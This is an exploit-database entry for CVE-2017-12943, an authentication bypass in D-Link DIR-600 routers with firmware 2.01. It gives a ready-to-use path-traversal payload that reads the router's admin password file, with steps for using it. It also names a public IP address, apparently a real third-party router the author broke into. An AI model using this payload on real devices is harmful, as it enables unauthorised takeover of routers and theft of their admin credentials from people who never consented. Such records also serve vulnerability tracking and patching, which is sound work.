ID

VAR-E-201708-0093

CVE

EDB ID

42581

TITLE

D-Link DIR-600 - Authentication Bypass - Hardware webapps Exploit

DESCRIPTION

D-Link DIR-600 - Authentication Bypass. CVE-2017-12943 . webapps exploit for Hardware platform

AFFECTED PRODUCTS

EXPLOIT

# Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack)
# CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943
# Date: 29-08-2017
# Exploit Author: Jithin D Kurup
# Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142
# Vendor : www.dlink.com
# Version: Hardware version: B1
Firmware version: 2.01
# Tested on:All Platforms


1) Description

After Successfully Connected to D-Link DIR-600
Router(FirmWare Version : 2.01), Any User Can Easily Bypass The Router's
Admin Panel Just by adding a simple payload into URL.

D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to
read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack,
as demonstrated by discovering the admin password.

Its More Dangerous when your Router has a public IP with remote login
enabled.


IN MY CASE,
Tested Router IP : http://190.164.170.249



Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ

2) Proof of Concept

Step 1: Go to
Router Login Page : http://190.164.170.249:8080

Step 2:
Add the payload to URL.

Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd

Bingooo You got admin Access on router.
Now you can download/upload settiing, Change setting etc.




---------------Greetz----------------
+++++++++++ www.0seccon.com ++++++++++++
Saran,Dhani,Gem,Vignesh,Hemanth,Sudin,Vijith

EXPLOIT LANGUAGE

txt

PRICE

free

TYPE

Authentication Bypass

CREDITS

Jithin D Kurup

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

2022-07-27T09:49:22.303000+00:00

SOURCES RELEASE DATE